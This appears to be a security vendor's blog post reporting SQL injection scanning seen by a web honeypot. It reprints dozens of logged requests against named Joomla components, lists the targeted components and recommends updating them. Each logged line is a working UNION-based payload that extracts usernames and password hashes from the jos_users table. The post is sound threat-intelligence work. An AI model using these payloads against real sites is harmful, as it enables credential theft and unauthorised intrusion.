Loading...
Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

[Honeypot Alert] SQL Injection Scanning Targeting Joomla Plugins

The following SQL Injection attack payloads targeting Joomla components were identified in our web honeypot sensor logs:

91.213.96.32 - - [28/Nov/2012:11:31:04 +0100] "GET /index.php?option=com_joomgalaxy&view=categorylist&type=thumbnail&lang=en&catid=100000001-100000001=0 union (select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users) HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:31:42 +0100] "GET /index.php?option=com_spidercalendar&date=999999.9' union all select null,null,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),null,null,null+from+jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.46.10 - - [28/Nov/2012:11:31:47 +0100] "GET /index.php?option=com_tag&task=tag&lang=es&tag=999999.9' union all select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:31:49 +0100] "GET /index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) from jos_users),null-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:00 +0100] "GET /index.php?option=com_discussions&view=thread&catid=0&thread=1' union select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) from jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:12 +0100] "GET /index.php?option=com_question&catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),8,9 from jos_users--  HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:18 +0100] "GET /index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5 FROM jos_users HTTP/1.1" 400 299 "-" "-"72.167.232.203 - - [28/Nov/2012:11:32:20 +0100] "GET /index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3 FROM jos_users HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:32:35 +0100] "GET /index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:32:37 +0100] "GET /index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"173.201.196.10 - - [28/Nov/2012:11:33:32 +0100] "GET /index.php?option=com_biblioteca&view=biblioteca&testo=-a%' UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"74.220.219.107 - - [28/Nov/2012:11:34:09 +0100] "GET /index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:34:12 +0100] "GET /index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users-- HTTP/1.1" 400 299 "-" "-"208.109.181.130 - - [28/Nov/2012:11:34:26 +0100] "GET /index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:34:29 +0100] "GET /index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),10,11,12,13,14,15,16,17 FROM jos_users HTTP/1.1" 400 299 "-" "-"208.109.181.130 - - [28/Nov/2012:11:37:07 +0100] "GET /index.php?option=com_listbingo&q=11111&catid=0&search_from_price=999 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),32,33,34,35,36,37 from `jos_users` -- '&search_to_price=2&search=Search&task=ads.search HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:37:08 +0100] "GET /index.php?option=com_answers&task=detail&id=-1' union select concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3,4,5,6,7,8,9 from jos_users where gid=25 limit 1 -- ' HTTP/1.1" 400 299 "-" "-"67.205.46.10 - - [28/Nov/2012:11:37:58 +0100] "GET /index.php?option=com_event&task=details&sid=-61 union select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 400 299 "-" "-"98.130.2.75 - - [28/Nov/2012:11:39:33 +0100] "GET /index.php?option=com_jdrugstopics&view=drugsdetails&id=-226 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13 from jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:40:50 +0100] "GET /index.php?option=com_joomloc&controller=loc&view=loc&layout=loc&task=edit&cid[]=1&id=1 and 1=2 union select 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:43:38 +0100] "GET /index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),11,12,13,14,15,16 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:43:39 +0100] "GET /index.php?option=com_equotes&id=13 and 1=1 union select user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"173.239.26.52 - - [28/Nov/2012:11:43:59 +0100] "GET /index.php?option=com_flashmagazinedeluxe&Itemid=10&task=magazine&mag_id=-4+union+select+1,2,3,unhex(hex(concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 FROM jos_users/* HTTP/1.1" 400 299 "-" "-"184.168.152.10 - - [28/Nov/2012:11:44:03 +0100] "GET /index.php?option=com_news&id=-148+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users-- HTTP/1.1" 400 299 "-" "-"208.109.14.76 - - [28/Nov/2012:11:45:19 +0100] "GET /index.php?option=com_catalogproduction&task=viewdetail&id=-9999 union all select 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:46:34 +0100] "GET /index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users&task=pay_options&Itemid=138 HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:47:19 +0100] "GET /index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"74.220.219.107 - - [28/Nov/2012:11:47:24 +0100] "GET /index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"70.38.64.238 - - [28/Nov/2012:11:47:25 +0100] "GET /index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"62.112.195.221 - - [28/Nov/2012:11:48:07 +0100] "GET /index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"208.109.14.76 - - [28/Nov/2012:11:48:49 +0100] "GET /index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"117.20.1.78 - - [28/Nov/2012:11:49:00 +0100] "GET /index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:49:14 +0100] "GET /index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"117.20.1.78 - - [28/Nov/2012:11:49:21 +0100] "GET /index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"173.201.196.10 - - [28/Nov/2012:11:49:43 +0100] "GET /index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:49:47 +0100] "GET /index.php?option=com_departments&id=-1 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8+from+jos_users-- HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:49:50 +0100] "GET /index.php?option=com_business&view=business®ion=37&category_id=-1 UNION SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26)+from+jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.46.10 - - [28/Nov/2012:11:49:52 +0100] "GET /index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8+from+jos_users-- HTTP/1.1" 400 299 "-" "-"91.213.96.32 - - [28/Nov/2012:11:50:35 +0100] "GET /index.php?option=com_television&view=television&id=-1 UNION SELECT 1,2,3,4,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- HTTP/1.1" 400 299 "-" "-"91.213.96.32 - - [28/Nov/2012:11:51:03 +0100] "GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26) FROM jos_users-- HTTP/1.1" 400 299 "-" "-"67.205.52.169 - - [28/Nov/2012:11:51:14 +0100] "GET /index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:51:20 +0100] "GET /index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:51:30 +0100] "GET /index.php?option=com_leader&Itemid=3160&task=view&id=-498 UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11 FROM jos_users-- HTTP/1.1" 400 299 "-" "-"92.38.226.14 - - [28/Nov/2012:11:51:34 +0100] "GET /index.php?option=com_about&task=view&id=-24+UNION SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+jos_users-- HTTP/1.1" 400 299 "-" "-"178.208.83.27 - - [28/Nov/2012:11:51:36 +0100] "GET /index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),4,5,6,7,8+from+jos_users&op=category_details HTTP/1.1" 400 299 "-" "-"208.109.181.130 - - [28/Nov/2012:11:51:56 +0100] "GET /index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2+from+jos_users-- HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:52:47 +0100] "GET /index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),2,3,4+from+jos_users-- HTTP/1.1" 400 299 "-" "-"111.223.32.119 - - [28/Nov/2012:11:52:55 +0100] "GET /index.php?option=com_videos&act=view&Itemid=27&id=-1084+UNION SELECT 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users HTTP/1.1" 400 299 "-" "-"173.236.153.214 - - [28/Nov/2012:11:53:38 +0100] "GET /index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users-- HTTP/1.1" 400 299 "-" "-"184.168.152.11 - - [28/Nov/2012:11:54:53 +0100] "GET /index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(0x26,0x26,0x26,0x25,0x25,0x25,username,0x3a,password,0x25,0x25,0x25,0x26,0x26,0x26),3,4,5,6,7,8,9,10 from jos_users-- HTTP/1.1" 400 299 "-" "-"

Here is a listing of the various Joomla Plugins being targeted:

com_aboutcom_amblogcom_answerscom_b2portfoliocom_bibliotecacom_biddingcom_bookcom_bookjoomlascom_brightweblinkscom_businesscom_catalogproductioncom_commediacom_departmentscom_discussionscom_dtregistercom_equotescom_eventcom_expshopcom_flashmagazinedeluxecom_gameqcom_hdvideosharecom_includecom_jabodecom_jdrugstopicscom_joomgalaxycom_joomladatecom_joomloccom_jscalendarcom_leadercom_listbingocom_netinvoicecom_newscom_nfnaddressbookcom_peoplecom_productbookcom_productscom_questioncom_radiocom_rapidrecipecom_simpleshopcom_spidercalendarcom_tagcom_televisioncom_timetrackcom_ttvideocom_versioningcom_videoscom_yanccom_yellowpages

If you are running Joomla, it is highly recommended that you download that most up-to-date plugins from the Joomal extension site to ensure that you do not have an out-dated version that is vulnerable to these attacks.

ModSecurity Commercial Rules

The SpiderLabs Comemrcial ModSecurity Rules Feed includes more than 400 virtual patches for Joomla Component vulnerabilities.